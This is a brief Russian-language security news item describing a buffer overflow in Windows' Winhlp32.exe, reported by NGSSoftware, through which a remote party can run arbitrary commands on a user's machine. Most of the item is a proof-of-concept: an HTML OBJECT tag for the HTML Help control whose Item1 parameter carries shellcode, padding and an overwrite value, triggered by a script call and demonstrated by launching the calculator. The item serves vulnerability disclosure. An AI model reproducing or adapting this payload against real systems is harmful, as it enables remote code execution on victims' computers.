В программе Winhlp32.exe можно переполнить
буфер и, как следствие, получить полный
доступ к системе. NGSSoftware обнаружила, что
передавая излишне длинный путь к
файлу справки удаленный пользователь может 
выполнить на машине пользователя любые
команды.

Пример - запускается калькулятор:

<OBJECT classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11 codeBase=hhctrl.ocx#Version=4,72,8252,0
height=0 id=winhelp type=application/x-oleobject width=0><PARAM NAME="Width"
VALUE="26"><PARAM NAME="Height" VALUE="26"><PARAM
NAME="Command" VALUE="WinHelp"><PARAM NAME="Item1"
VALUE="ђђђђђђђђ3АPhcalcЌ4$&#402;А&#1;PVёЇ§йwяР3АPѕ&#8221;ЏйwяЦAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOP
PPPQQQQRRRRSSSSTTTAAAA&#11;©хwABCDEFGHђ&#402;Ж&#21;яжgMyWindow"><PARAM
NAME="Item2" VALUE="NGS Software LTD"></OBJECT>
<SCRIPT>winhelp.HHClick()</SCRIPT>

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии